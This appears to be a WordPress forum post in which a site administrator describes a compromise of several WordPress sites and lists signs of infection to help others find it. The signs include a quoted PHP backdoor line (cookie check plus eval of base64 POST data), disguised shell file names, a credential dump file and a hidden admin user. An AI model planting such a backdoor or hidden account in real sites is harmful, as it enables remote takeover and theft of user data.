Security issue, multiple sites

This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I’d cleaned those up and upgraded to 2.3.3, since 2.5 wasn’t yet available as a release.

This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

I’m still trying to unravel the mess and clean it up, but here’s a rundown of tell-tale signs I’ve found.

Check any .php file for this code added to the top of the file:
<?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven’t yet figured out where or how that info is sent to anyone.

I can send a copy of the script to anyone in WP security if needed, but I don’t know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

So I’ve asked all the users on those sites to update their passwords, even if they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I’ve listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

I am in the process of changing the DB passwords on those sites, and deleting the new “WordPress” user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5

What I don’t know yet is if one site was the “in” door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.